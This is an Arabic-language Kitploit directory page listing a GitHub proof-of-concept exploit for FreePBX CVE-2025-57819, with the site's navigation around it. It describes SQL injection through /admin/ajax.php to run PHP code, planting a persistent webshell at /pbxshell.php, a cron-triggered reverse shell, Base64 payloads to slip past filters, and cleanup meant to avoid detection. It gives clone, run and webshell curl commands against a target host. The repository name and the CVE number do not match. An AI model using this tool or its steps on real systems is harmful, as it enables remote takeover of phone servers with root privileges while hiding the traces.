Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-5781 — استغلال إثبات المفهوم لثغرة CVE-2025-57819 في FreePBX: حقن SQL في واجهة AJAX API لتنفيذ كود PHP تعسفي، وإنشاء قشرة ويب (webshell) دائمة، وتشغيل قشرة عكسية (reverse shell). | Kitploit
أدوات/GitHubGitHub/jasonbernier/cve-2025-5781
آليات الاستمراريةالاستغلالاستغلال تطبيقات الويبما بعد الاستغلالالقيادة والسيطرةتطوير الحمولات
GitHubjasonbernier/cve-2025-5781

CVE-2025-5781

استغلال إثبات المفهوم لثغرة CVE-2025-57819 في FreePBX: حقن SQL في واجهة AJAX API لتنفيذ كود PHP تعسفي، وإنشاء قشرة ويب (webshell) دائمة، وتشغيل قشرة عكسية (reverse shell).

عرض المستودع
منذ 9 أياملم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

استغلال ثغرة CVE-2025-57819 في FreePBX

الوصف

يستغل هذا السكربت ثغرة أمنية في إصدارات FreePBX الأقدم من 16.0.26.0 (CVE-2025-57819)، مما يسمح للمهاجمين عن بُعد بتنفيذ كود PHP عشوائي عبر خلل في حقن SQL في نقطة نهاية AJAX API. يقوم هذا الاستغلال بإنشاء كل من قشرة ويب وقشرة عكسية تُفعَّل تلقائيًا.

تفاصيل الثغرة

  • CVE: CVE-2025-57819
  • الإصدارات المتأثرة: FreePBX < 16.0.26.0
  • التأثير: تنفيذ الكود عن بُعد (RCE)
  • ناقل الهجوم: حقن SQL في AJAX API (/admin/ajax.php)

الميزات

  • إنشاء قشرة ويب دائمة في /pbxshell.php
  • إعداد قشرة عكسية تُفعَّل تلقائيًا عبر مهمة cron
  • استخدام حمولات مشفّرة بـ Base64 لتجاوز عوامل التصفية
  • تنظيف تلقائي لمهام cron بعد التنفيذ

المتطلبات

  • Python 3.x
  • مكتبة requests
  • Netcat (لمستمع القشرة العكسية)

التثبيت

root@kitploit:~
git clone https://github.com/jasonbernier/CVE-2025-5781.git
cd CVE-2025-5781
pip install requests

الاستخدام

root@kitploit:~
python3 exploit.py -H TARGET_HOST -lhost LHOST -lport LPORT

المعاملات:

  • -H HOST: مثيل FreePBX الهدف (مثل: https://freepbx.example.com)
  • -lhost LHOST: عنوان IP الخاص بك لاستقبال القشرة العكسية
  • -lport LPORT: المنفذ المستخدم لاتصال القشرة العكسية

مثال:

root@kitploit:~
python3 exploit.py -H https://target.freepbx.com -lhost 10.0.0.1 -lport 4444

خطوات الاستغلال

  1. إرسال حمولة حقن SQL لإنشاء قشرة ويب
  2. الانتظار حتى يتم إنشاء قشرة الويب (حوالي دقيقتين)
  3. إنشاء قشرة عكسية تُفعَّل تلقائيًا عبر مهمة cron
  4. تشغيل مستمع netcat على المنفذ المحدد

استخدام قشرة الويب

بعد نجاح الاستغلال، يمكن الوصول إلى قشرة الويب عبر:

root@kitploit:~
curl -X GET "http://TARGET/pbxshell.php?cmd=id"

التنظيف

يقوم الاستغلال تلقائيًا بإزالة مهام cron بعد التنفيذ لتجنب اكتشافه.

ملاحظات

  • يستخدم السكربت -- لتعليق باقي صيغة SQL
  • يتم تنفيذ جميع الأوامر بصلاحيات الجذر
  • يتطلب صلاحية الكتابة في دليل /var/www/html/

المراجع

  • CVE-2025-57819
  • نشرة FreePBX الأمنية
تنزيل الأداة